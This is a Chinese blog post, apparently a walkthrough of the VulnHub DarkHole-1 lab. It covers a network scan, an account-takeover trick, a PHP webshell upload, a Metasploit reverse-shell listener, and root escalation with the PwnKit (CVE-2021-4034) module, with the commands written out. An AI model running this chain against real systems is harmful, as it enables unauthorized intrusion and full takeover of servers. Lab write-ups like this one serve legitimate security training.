Web到Linux-内核溢出Pwnkit

于 2024-08-29 21:07:24 发布
阅读量211 收藏 3
点赞数 6
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_85783544/article/details/141686790
版权
复现环境: https://www.vulnhub.com/entry/darkhole-1,724/
解压DarkHole.zip,导⼊虚拟机

步骤一:信息搜集

1.探测⽬标ip及开发端⼝
nmap -p1-65535 192.168.251.0/24

2.发现了开放80端口192.168.251.128

步骤二:Web漏洞利⽤

1.重置管理密码,注册新账号抓包将id改为1

2.使用admin管理员账号登录

3. 上传一个1.phtml的木马

4.用哥斯拉来连接

步骤三:反弹MSF  

1.将内核检测脚本和综合检测脚本都上传到⽬标服务器的/tmp⽬录

2.启动msf
msfdb run
2.监听本地6666端⼝等待php反弹后⻔连接
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
run

步骤四:内核提权

1.上传提权辅助脚本
upload /root/linux-exploit-suggester.sh /tmp/linux-exploit-suggester.sh
upload /root/linpeas.sh /tmp/linpeas.sh
2.进⼊shell
shell
cd /tmp
chmod +x linpeas.sh
chmod +x linux-exploit-suggester.sh
3.综合辅助脚本
./linpeas.sh
4. 内核辅助脚本
./linux-exploit-suggester.sh

5.查找漏洞利⽤模块
search cve_2021_4034
6.使⽤提权漏洞利⽤模块
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set session 1
run
7. 在获取的shell中查看当前⽤户权限
getuid
詹姆诗
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux 内核源码-版本linux-5.15.118
06-24
文件名:linux-5.15.118.tar.xz 文件发布日期: 2023-06-21 说明: 该版本是长期支持版本.
linux-内核源代码
08-22
linux-内核源代码
linux-surface:适用于Surface设备Linux内核
02-04
- `linux-surface`内核可能与各种主流Linux发行版(如Ubuntu、Fedora、Debian等)兼容,用户需要了解如何在这些发行版上使用或切换到这个定制内核。 10. **故障排查与日志分析**: - 在使用`linux-surface`内核时...
linux-3.10内核源码
03-29
linux内核源码。3.10版本比较难找了,未经过修改,有需要的可以下载,不喜勿喷。
Linux 4.4.0-116-generic 内核安装包
04-28
Linux 4.4.0-116-generic 内核安装包
虚拟内存和linux(操作系统八股文part1)
linjixia的博客
08-24 1237
八股之虚拟内存和Linux部分的笔记。
Linux 线程的控制 互斥与同步
qq_63145217的博客
08-23 1465
include //头文件sem_t sem;信号量的类型 信号量的变量。
Linux中杀死占用某个端口的进程
靖妖傩舞
08-28 364
选项表示强制终止进程,但这种方式可能会导致数据丢失或其他不良后果,所以在使用时要谨慎。确定要杀死的进程 PID。从上述步骤中获取到占用端口 9997 的进程 PID。
Linuxctags——R的使用
m0_71703182的博客
08-23 716
按下。
Linux 进程 | 进程优先级&进程的环境变量
TTKunn的博客
08-23 1604
本文主要内容为进程的优先级和进程的环境变量,其中含有查看进程、优先级概念、环境变量概念等详细内容
linux发邮件的操作流程和注意事项有哪些?
danplus的博客
08-23 601
掌握Linux发邮件的操作流程和注意事项,可以帮助你在Linux系统中高效、安全地发送邮件。AokSend:集成API与SMTP,Linux下一键高效发邮件,稳定可靠,营销自动化首选!
Linux-部署YUM仓库及NFS共享服务
qq_42520799的博客
08-25 983
YUM仓库服务、NFS共享存储服务等
linux上datax 安装以及使用
寂夜了无痕的博客
08-24 2636
linux上datax 安装以及使用
fork exec cow
bonfirelit的博客
08-23 924
在fork()时:COW 允许父进程和子进程共享相同的内存页面,直到有一个进程进行写操作。这减少了不必要的内存复制,提高了性能。在exec()时:COW 提供的内存共享机制可以避免在调用exec()之前进行不必要的内存复制,但在exec()调用之后,这些共享内存将被新加载的可执行文件所取代。
linux terminal文件查找
最新发布
xidianhuihui的专栏
08-28 611
以下所有命令仅仅只做常见用法的介绍,不做详细的参数介绍如需详细介绍,可到查阅以下的显示结果均为使用oh-my-zsh的显示结果,如果是使用bash可能略有差异:zsh 默认情况下不支持通配符匹配,需要在~/.zshrc中添加即可。
Linux 部署 MinIO(远程服务器
qq_70786441的博客
08-25 926
自定义账号与登录密码,直接在本目录默认登录账号和密码都是:minioadmin# 设置控制台账号(最少3位)# 登录密码(最少8位)创建文件存储目录与日志目录:# 创建存储目录#创建日志文件创建 启动脚本:# 使用 vim 或 vi 创建启动脚本# i 进行编辑 操作脚本授权:# 脚本授权# 进入存放 启动命令目录下# 启动命令./start.sh查看进程:# 查看 minio 进程。
Linux下编译安装PETSc
国产CAx(CAD/CAE/CAM)软件研发
08-25 395
本文记录在Linux编译安装PETSc的流程。
Linux篇】vim编译器
2301_80912559的博客
08-24 312
vi / vim是visual interface的简称,是Linux中最典型的文本编辑器。同图形化界面中的文本编辑器一样,vi是命令行下对文本文件进行编辑的绝佳选择。vim是vi的加强版本,兼容vi的所有指令,不仅能编译文本,而且还具有shell程序编程的功能,可以不同颜色的字体来辨别语法的正确性,极大的方便了程序的设计和编辑性。
Linux 从基础到进阶】GlusterFS分布式文件系统搭建
weixin_39372311的博客
08-25 470
Bricks(砖块): GlusterFS中的基本存储单元,每个Brick通常对应一个目录,位于一个存储服务器上。Volume(卷): 由多个Bricks组成的逻辑存储单元,客户端通过挂载Volume来访问存储在GlusterFS中的文件。Translator(翻译器): GlusterFS的核心组件,负责实现数据分片、复制、分布等功能。GlusterFS是一款功能强大且易于扩展的分布式文件系统,适用于企业级存储需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值